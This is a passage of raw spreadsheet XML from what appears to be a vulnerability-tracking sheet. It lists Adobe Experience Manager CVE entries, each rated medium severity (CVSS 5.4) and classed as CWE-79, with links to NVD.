r="G2025" s="5" t="inlineStr" /><c r="H2025" s="5" t="n"><v>0.002</v></c><c r="I2025" s="5" t="inlineStr" /><c r="J2025" s="5" t="inlineStr" /><c r="K2025" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2025" s="5" t="inlineStr" /><c r="M2025" s="5" t="inlineStr" /><c r="N2025" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2025" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2025" s="5" t="inlineStr" /><c r="Q2025" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R202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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72626</t></is></c></row><row r="2026"><c r="A2026" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2026" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2026" s="5" t="inlineStr"><is><t>CVE-2026-72627</t></is></c><c r="D2026" s="5" t="n"><v>5.4</v></c><c r="E2026" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2026" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2026" s="5" t="inlineStr" /><c r="H2026" s="5" t="n"><v>0.002</v></c><c r="I2026" s="5" t="inlineStr" /><c r="J2026" s="5" t="inlineStr" /><c r="K2026" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2026" s="5" t="inlineStr" /><c r="M2026" s="5" t="inlineStr" /><c r="N2026" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2026" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2026" s="5" t="inlineStr" /><c r="Q2026" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R202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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72627</t></is></c></row><row r="2027"><c r="A2027" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2027" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2027" s="5" t="inlineStr"><is><t>CVE-2026-75629</t></is></c><c r="D2027" s="5" t="n"><v>5.4</v></c><c r="E2027" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2027" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2027" s="5" t="inlineStr" /><c r="H2027" s="5" t="n"><v>0.002</v></c><c r="I2027" s="5" t="inlineStr" /><c r="J2027" s="5" t="inlineStr" /><c r="K2027" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2027" s="5" t="inlineStr" /><c r="M2027" s="5" t="inlineStr" /><c r="N2027" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2027" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2027" s="5" t="inlineStr" /><c r="Q2027" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R202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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75629</t></is></c></row><row r="2028"><c r="A2028" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2028" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2028" s="5" t="inlineStr"><is><t>CVE-2026-75635</t></is></c><c r="D2028" s="5" t="n"><v>5.4</v></c><c r="E2028" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2028" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2028" s="5" t="inlineStr" /><c r="H2028" s="5" t="n"><v>0.002</v></c><c r="I2028" s="5" t="inlineStr" /><c r="J2028" s="5" t="inlineStr" /><c r="K2028" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2028" s="5" t="inlineStr" /><c r="M2028" s="5" t="inlineStr" /><c r="N2028" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2028" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2028" s="5" t="inlineStr" /><c r="Q2028" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R202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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75635</t></is></c></row><row r="2029"><c r="A2029" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2029" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2029" s="5" t="inlineStr"><is><t>CVE-2026-75636</t></is></c><c r="D2029" s="5" t="n"><v>5.4</v></c><c r="E2029" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2029" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2029" s="5" t="inlineStr" /><c r="H2029" s="5" t="n"><v>0.002</v></c><c r="I2029" s="5" t="inlineStr" /><c r="J2029" s="5" t="inlineStr" /><c r="K2029" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2029" s="5" t="inlineStr" /><c r="M2029" s="5" t="inlineStr" /><c r="N2029" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2029" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2029" s="5" t="inlineStr" /><c r="Q2029" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R202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29" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75636</t></is></c></row><row r="2030"><c r="A2030" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2030" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2030" s="5" t="inlineStr"><is><t>CVE-2026-75637</t></is></c><c r="D2030" s="5" t="n"><v>5.4</v></c><c r="E2030" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2030" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2030" s="5" t="inlineStr" /><c r="H2030" s="5" t="n"><v>0.003</v></c><c r="I2030" s="5" t="inlineStr" /><c r="J2030" s="5" t="inlineStr" /><c r="K2030" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2030" s="5" t="inlineStr" /><c r="M2030" s="5" t="inlineStr" /><c r="N2030" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2030" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2030" s="5" t="inlineStr" /><c r="Q2030" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R203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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75637</t></is></c></row><row r="2031"><c r="A2031" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2031" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2031" s="5" t="inlineStr"><is><t>CVE-2026-75639</t></is></c><c r="D2031" s="5" t="n"><v>5.4</v></c><c r="E2031" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2031" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2031" s="5" t="inlineStr" /><c r="H2031" s="5" t="n"><v>0.002</v></c><c r="I2031" s="5" t="inlineStr" /><c r="J2031" s="5" t="inlineStr" /><c r="K2031" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2031" s="5" t="inlineStr" /><c r="M2031" s="5" t="inlineStr" /><c r="N2031" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2031" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2031" s="5" t="inlineStr" /><c r="Q2031" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R203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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75639</t></is></c></row><row r="2032"><c r="A2032" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2032" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2032" s="5" t="inlineStr"><is><t>CVE-2026-75640</t></is></c><c r="D2032" s="5" t="n"><v>5.4</v></c><c r="E2032" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2032" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2032" s="5" t="inlineStr" /><c r="H2032" s="5" t="n"><v>0.002</v></c><c r="I2032" s="5" t="inlineStr" /><c r="J2032" s="5" t="inlineStr" /><c r="K2032" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2032" s="5" t="inlineStr" /><c r="M2032" s="5" t="inlineStr" /><c r="N2032" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2032" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2032" s="5" t="inlineStr" /><c r="Q2032" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R203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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75640</t></is></c></row><row r="2033"><c r="A2033" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2033" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2033" s="5" t="inlineStr"><is><t>CVE-2026-75642</t></is></c><c r="D2033" s="5" t="n"><v>5.4</v></c><c r="E2033" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2033" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2033" s="5" t="inlineStr" /><c r="H2033" s="5" t="n"><v>0.002</v></c><c r="I2033" s="5" t="inlineStr" /><c r="J2033" s="5" t="inlineStr" /><c r="K2033" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2033" s="5" t="inlineStr" /><c r="M2033" s="5" t="inlineStr" /><c r="N2033" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2033" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2033" s="5" t="inlineStr" /><c r="Q2033" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R203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33" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75642</t></is></c></row><row r="2034"><c r="A2034" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2034" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2034" s="5" t="inlineStr"><is><t>CVE-2026-75643</t></is></c><c r="D2034" s="5" t="n"><v>5.4</v></c><c r="E2034" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2034" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2034" s="5" t="inlineStr" /><c r="H2034" s="5" t="n"><v>0.002</v></c><c r="I2034" s="5" t="inlineStr" /><c r="J2034" s="5" t="inlineStr" /><c r="K2034" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2034" s="5" t="inlineStr" /><c r="M2034" s="5" t="inlineStr" /><c r="N2034" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2034" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2034" s="5" t="inlineStr" /><c r="Q2034" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R203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34" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75643</t></is></c></row><row r="2035"><c r="A2035" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2035" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2035" s="5" t="inlineStr"><is><t>CVE-2026-75644</t></is></c><c r="D2035" s="5" t="n"><v>5.4</v></c><c r="E2035" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2035" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2035" s="5" t="inlineStr" /><c r="H2035" s="5" t="n"><v>0.002</v></c><c r="I2035" s="5" t="inlineStr" /><c r="J2035" s="5" t="inlineStr" /><c r="K2035" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2035" s="5" t="inlineStr" /><c r="M2035" s="5" t="inlineStr" /><c r="N2035" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2035" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2035" s="5" t="inlineStr" /><c r="Q2035" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R203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35" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75644</t></is></c></row><row r="2036"><c r="A2036" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2036" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2036" s="5" t="inlineStr"><is><t>CVE-2026-75646</t></is></c><c r="D2036" s="5" t="n"><v>5.4</v></c><c r="E2036" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2036" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2036" s="5" t="inlineStr" /><c r="H2036" s="5" t="n"><v>0.002</v></c><c r="I2036" s="5" t="inlineStr" /><c r="J2036" s="5" t="inlineStr" /><c r="K2036" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2036" s="5" t="inlineStr" /><c r="M2036" s="5" t="inlineStr" /><c r="N2036" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2036" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2036" s="5" t="inlineStr" /><c r="Q2036" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R203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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75646</t></is></c></row><row r="2037"><c r="A2037" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2037" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2037" s="5" t="inlineStr"><is><t>CVE-2026-75647</t></is></c><c r="D2037" s="5" t="n"><v>5.4</v></c><c r="E2037" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2037" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2037" s="5" t="inlineStr" /><c r="H2037" s="5" t="n"><v>0.002</v></c><c r="I2037" s="5" t="inlineStr" /><c r="J2037" s="5" t="inlineStr" /><c r="K2037" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2037" s="5" t="inlineStr" /><c r="M2037" s="5" t="inlineStr" /><c r="N2037" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2037" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2037" s="5" t="inlineStr" /><c r="Q2037" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R203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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75647</t></is></c></row><row r="2038"><c r="A2038" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2038" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2038" s="5" t="inlineStr"><is><t>CVE-2026-75651</t></is></c><c r="D2038" s="5" t="n"><v>5.4</v></c><c r="E2038" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2038" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2038" s="5" t="inlineStr" /><c r="H2038" s="5" t="n"><v>0.002</v></c><c r="I2038" s="5" t="inlineStr" /><c r="J2038" s="5" t="inlineStr" /><c r="K2038" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2038" s="5" t="inlineStr" /><c r="M2038" s="5" t="inlineStr" /><c r="N2038" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2038" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2038" s="5" t="inlineStr" /><c r="Q2038" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R203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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75651</t></is></c></row><row r="2039"><c r="A2039" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2039" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2039" s="5" t="inlineStr"><is><t>CVE-2026-75652</t></is></c><c r="D2039" s="5" t="n"><v>5.4</v></c><c r="E2039" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2039" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2039" s="5" t="inlineStr" /><c r="H2039" s="5" t="n"><v>0.002</v></c><c r="I2039" s="5" t="inlineStr" /><c r="J2039" s="5" t="inlineStr" /><c r="K2039" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2039" s="5" t="inlineStr" /><c r="M2039" s="5" t="inlineStr" /><c r="N2039" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2039" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2039" s="5" t="inlineStr" /><c r="Q2039" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R203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39" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75652</t></is></c></row><row r="2040"><c r="A2040" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2040" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2040" s="5" t="inlineStr"><is><t>CVE-2026-75657</t></is></c><c r="D2040" s="5" t="n"><v>5.4</v></c><c r="E2040" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2040" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2040" s="5" t="inlineStr" /><c r="H2040" s="5" t="n"><v>0.002</v></c><c r="I2040" s="5" t="inlineStr" /><c r="J2040" s="5" t="inlineStr" /><c r="K2040" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2040" s="5" t="inlineStr" /><c r="M2040" s="5" t="inlineStr" /><c r="N2040" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2040" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2040" s="5" t="inlineStr" /><c r="Q2040" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R204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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75657</t></is></c></row><row r="2041"><c r="A2041" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2041" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2041" s="5" t="inlineStr"><is><t>CVE-2026-75659</t></is></c><c r="D2041" s="5" t="n"><v>5.4</v></c><c r="E2041" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2041" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2041" s="5" t="inlineStr" /><c r="H2041" s="5" t="n"><v>0.002</v></c><c r="I2041" s="5" t="inlineStr" /><c r="J2041" s="5" t="inlineStr" /><c r="K2041" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2041" s="5" t="inlineStr" /><c r="M2041" s="5" t="inlineStr" /><c r="N2041" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2041" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2041" s="5" t="inlineStr" /><c r="Q2041" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R204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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75659</t></is></c></row><row r="2042"><c r="A2042" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2042" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2042" s="5" t="inlineStr"><is><t>CVE-2026-75660</t></is></c><c r="D2042" s="5" t="n"><v>5.4</v></c><c r="E2042" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2042" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2042" s="5" t="inlineStr" /><c r="H2042" s="5" t="n"><v>0.002</v></c><c r="I2042" s="5" t="inlineStr" /><c r="J2042" s="5" t="inlineStr" /><c r="K2042" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2042" s="5" t="inlineStr" /><c r="M2042" s="5" t="inlineStr" /><c r="N2042" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2042" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2042" s="5" t="inlineStr" /><c r="Q2042" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R204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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75660</t></is></c></row><row r="2043"><c r="A2043" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2043" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2043" s="5" t="inlineStr"><is><t>CVE-2026-75661</t></is></c><c r="D2043" s="5" t="n"><v>5.4</v></c><c r="E2043" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2043" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2043" s="5" t="inlineStr" /><c r="H2043" s="5" t="n"><v>0.003</v></c><c r="I2043" s="5" t="inlineStr" /><c r="J2043" s="5" t="inlineStr" /><c r="K2043" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2043" s="5" t="inlineStr" /><c r="M2043" s="5" t="inlineStr" /><c r="N2043" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2043" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2043" s="5" t="inlineStr" /><c r="Q2043" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R204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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75661</t></is></c></row><row r="2044"><c r="A2044" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2044" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2044" s="5" t="inlineStr"><is><t>CVE-2026-75666</t></is></c><c r="D2044" s="5" t="n"><v>5.4</v></c><c r="E2044" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2044" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2044" s="5" t="inlineStr" /><c r="H2044" s="5" t="n"><v>0.003</v></c><c r="I2044" s="5" t="inlineStr" /><c r="J2044" s="5" t="inlineStr" /><c r="K2044" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2044" s="5" t="inlineStr" /><c r="M2044" s="5" t="inlineStr" /><c r="N2044" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2044" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2044" s="5" t="inlineStr" /><c r="Q2044" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R204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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75666</t></is></c></row><row r="2045"><c r="A2045" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2045" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2045" s="5" t="inlineStr"><is><t>CVE-2026-75667</t></is></c><c r="D2045" s="5" t="n"><v>5.4</v></c><c r="E2045" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2045" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2045" s="5" t="inlineStr" /><c r="H2045" s="5" t="n"><v>0.003</v></c><c r="I2045" s="5" t="inlineStr" /><c r="J2045" s="5" t="inlineStr" /><c r="K2045" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2045" s="5" t="inlineStr" /><c r="M2045" s="5" t="inlineStr" /><c r="N2045" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2045" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2045" s="5" t="inlineStr" /><c r="Q2045" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R204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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75667</t></is></c></row><row r="2046"><c r="A2046" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2046" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2046" s="5" t="inlineStr"><is><t>CVE-2026-75668</t></is></c><c r="D2046" s="5" t="n"><v>5.4</v></c><c r="E2046" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2046" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2046" s="5" t="inlineStr" /><c r="H2046" s="5" t="n"><v>0.003</v></c><c r="I2046" s="5" t="inlineStr" /><c r="J2046" s="5" t="inlineStr" /><c r="K2046" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2046" s="5" t="inlineStr" /><c r="M2046" s="5" t="inlineStr" /><c r="N2046" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2046" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2046" s="5" t="inlineStr" /><c r="Q2046" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R204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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75668</t></is></c></row><row r="2047"><c r="A2047" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2047" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2047" s="5" t="inlineStr"><is><t>CVE-2026-75669</t></is></c><c r="D2047" s="5" t="n"><v>5.4</v></c><c r="E2047" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2047" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2047" s="5" t="inlineStr" /><c r="H2047" s="5" t="n"><v>0.003</v></c><c r="I2047" s="5" t="inlineStr" /><c r="J2047" s="5" t="inlineStr" /><c r="K2047" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2047" s="5" t="inlineStr" /><c r="M2047" s="5" t="inlineStr" /><c r="N2047" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2047" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2047" s="5" t="inlineStr" /><c r="Q2047" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R204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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75669</t></is></c></row><row r="2048"><c r="A2048" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2048" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2048" s="5" t="inlineStr"><is><t>CVE-2026-75670</t></is></c><c r="D2048" s="5" t="n"><v>5.4</v></c><c r="E2048" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2048" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2048" s="5" t="inlineStr" /><c r="H2048" s="5" t="n"><v>0.003</v></c><c r="I2048" s="5" t="inlineStr" /><c r="J2048" s="5" t="inlineStr" /><c r="K2048" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2048" s="5" t="inlineStr" /><c r="M2048" s="5" t="inlineStr" /><c r="N2048" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2048" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2048" s="5" t="inlineStr" /><c r="Q2048" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R204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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75670</t></is></c></row><row r="2049"><c r="A2049" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2049" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2049" s="5" t="inlineStr"><is><t>CVE-2026-75671</t></is></c><c r="D2049" s="5" t="n"><v>5.4</v></c><c r="E2049" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2049" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2049" s="5" t="inlineStr" /><c r="H2049" s="5" t="n"><v>0.003</v></c><c r="I2049" s="5" t="inlineStr" /><c r="J2049" s="5" t="inlineStr" /><c r="K2049" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2049" s="5" t="inlineStr" /><c r="M2049" s="5" t="inlineStr" /><c r="N2049" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2049" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2049" s="5" t="inlineStr" /><c r="Q2049" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R204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49" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75671</t></is></c></row><row r="2050"><c r="A2050" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2050" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2050" s="5" t="inlineStr"><is><t>CVE-2026-75672</t></is></c><c r="D2050" s="5" t="n"><v>5.4</v></c><c r="E2050" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2050" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2050" s="5" t="inlineStr" /><c r="H2050" s="5" t="n"><v>0.003</v></c><c r="I2050" s="5" t="inlineStr" /><c r="J2050" s="5" t="inlineStr" /><c r="K2050" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2050" s="5" t="inlineStr" /><c r="M2050" s="5" t="inlineStr" /><c r="N2050" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2050" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2050" s="5" t="inlineStr" /><c r="Q2050" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R205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0" s="6" 